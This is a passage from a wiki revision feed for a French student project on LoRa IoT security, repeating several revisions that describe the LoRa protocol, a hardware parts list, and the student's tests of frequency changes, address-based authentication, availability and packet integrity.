&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
==Communication== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définie à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet. &lt;br /&gt;
&lt;br /&gt;
Il faudrait donc qu'un récepteur ait seulement un émetteur affilié. De plus les adresses circulent en clair et quelqu'un peut recevoir les adresses et envoyer des paquets aux modules en essayant de deviner si l'adresse est au récepteur ou à l'émetteur.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Disponibilité==&lt;br /&gt;
&lt;br /&gt;
Si un module est en panne ou rencontre un bug, il peut y avoir perte d'informations. Une solution pour éviter ce genre d'incident et de vérifier si le paquet est correctement reçu si le récepteur est en panne. Une réponse du récepteur vers l'émetteur serait obligatoire pour s'assurer que l'émetteur n'envoie pas dans le vide.&lt;br /&gt;
&lt;br /&gt;
Si l'émetteur n'a pas de paquet de confirmation, il envoie un paquet à un module dédié au report de panne pour lui informer que son paquet à destination de l'émetteur a rencontré un problème.&lt;br /&gt;
&lt;br /&gt;
Si c'est l'émetteur qui rencontre un problème, le récepteur ne peut pas savoir qu'il est en panne à moins qu'il vérifie l'état de ses émetteurs toutes les X minutes.S'il n'y a pas de réponses il envoie un paquet au module dédié au report de panne.&lt;br /&gt;
&lt;br /&gt;
Dans un cas plus simple où l'on pourrait faire fonctionner les modules assez fréquemment, on pourrait imaginer un système ou tous les modules envoient un paquet au module de report de panne. Le module de report compare avec sa base de données de modules et indique lorsqu'un module ne lui a pas fait signe depuis plus de X minutes.&lt;br /&gt;
&lt;br /&gt;
==Intégrité des paquets==&lt;br /&gt;
&lt;br /&gt;
Les paquets doivent être vérifiés pour être sur qu'ils ne soient pas corrompus. Lorsqu'un paquet est envoyé au récepteur, le récepteur renvoie le paquet à l'émetteur et celui-ci vérifie s'il est conforme à celui envoyé et renvoie le paquet s'il n'est pas conforme.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35703</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35703"/>
				<updated>2016-12-07T12:46:10Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
==Communication== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définie à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet. &lt;br /&gt;
&lt;br /&gt;
Il faudrait donc qu'un récepteur ait seulement un émetteur affilié. De plus les adresses circulent en clair et quelqu'un peut recevoir les adresses et envoyer des paquets aux modules en essayant de deviner si l'adresse est au récepteur ou à l'émetteur.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Disponibilité==&lt;br /&gt;
&lt;br /&gt;
Si un module est en panne ou rencontre un bug, il peut y avoir perte d'informations. Une solution pour éviter ce genre d'incident et de vérifier si le paquet est correctement reçu si le récepteur est en panne. Une réponse du récepteur vers l'émetteur serait obligatoire pour s'assurer que l'émetteur n'envoie pas dans le vide.&lt;br /&gt;
&lt;br /&gt;
Si l'émetteur n'a pas de paquet de confirmation, il envoie un paquet à un module dédié au report de panne pour lui informer que son paquet à destination de l'émetteur a rencontré un problème.&lt;br /&gt;
&lt;br /&gt;
Si c'est l'émetteur qui rencontre un problème, le récepteur ne peut pas savoir qu'il est en panne à moins qu'il vérifie l'état de ses émetteurs toutes les X minutes.S'il n'y a pas de réponses il envoie un paquet au module dédié au report de panne.&lt;br /&gt;
&lt;br /&gt;
Dans un cas plus simple où l'on pourrait faire fonctionner les modules assez fréquemment, on pourrait imaginer un système ou tous les modules envoient un paquet au module de report de panne. Le module de report compare avec sa base de données de modules et indique lorsqu'un module ne lui a pas fait signe depuis plus de X minutes.&lt;br /&gt;
&lt;br /&gt;
==Intégrité des paquets==&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35702</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35702"/>
				<updated>2016-12-07T12:33:25Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Authentification en 2 étapes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
